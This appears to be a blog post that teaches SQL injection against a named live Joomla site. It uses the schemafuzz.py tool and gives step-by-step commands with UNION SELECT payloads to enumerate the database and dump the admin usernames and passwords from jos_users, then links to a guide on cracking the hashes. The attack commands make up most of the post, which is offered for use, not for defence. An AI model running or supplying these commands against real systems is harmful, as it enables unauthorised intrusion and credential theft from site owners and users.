POC : Use SCHEMAFUZZ

7:16 PM -NGELIH-

Now, i will show you how to use SQL Injection Vulnerability to get username n password.
This web site is joomla based n you can use this technique with all web site based
I use a script that was built based on python programming language, that call is Schemafuzz.py

first step is find a target....

as shown below ...


and we must check to know that web was vurnerability for SQL Injection with give a single quotes (') in last URL
and if thare is a error page it's mean that vulnerrability.
This web show us it's error is
Warning: sort() expects parameter 1 to be array, null given in /home/webdata/archivesofrss.org/htdocs/components/com_biographies/biographies.php on line 168

Warning: natsort() [function.natsort]: The argument should be an array in /home/webdata/archivesofrss.org/htdocs/components/com_biographies/biographies.php on line 170
as shown below ...


Oke, This is a file a Schemafuzz.py
as shown below ...


And if we use a command "./schemafuzz.py -h" we will all option ini that script....
as shown below ...


next, we must to know how much colomn n magic colomn number with command ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5" --findcol
option -u = URL
option --findcol = to find a colomn
as shown below ...


The result isn like this
as shown below ...


next, we use a command ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --info
option --info = to find a database used
as shown below ...


The result isn like this
as shown below ...

from that result, we know that the databese used is "rssarchive", so we use next command is ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3"--schema -D rssarchive
option --schema = to know all tabel n colomn in a databasa
option -D = the database that want to know
as shown below ...


The result isn like this
as shown below ...






from that picture, we found a table called jos_users n colomn username,password,usertype,etc that save a usernama n password from joomla admin.
so, we use a last command to get a username n passsword. The command is ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dump -D rssarchive -T jos_users -C username,password,usertype
as shown below ...


The result is like this
as shown below ...


from that picture we get a usernama n password
next step we must crack that password. You can see that way in my Blog http://web-vuln.blogspot.com/2010/01/cracking-password-joomla-hash-md5salt.html


You can download that schemafuzz.py script ini HERE

See u next soon.....

Posted in
You can leave a response, or trackback from your own site.

0 Response to "POC : Use SCHEMAFUZZ"

Post a Comment

Subscribe to: Post Comments (Atom)
Subscribe
Follow me!

    DONATIONS PLEASE...

    My YM

Powered by NGELIH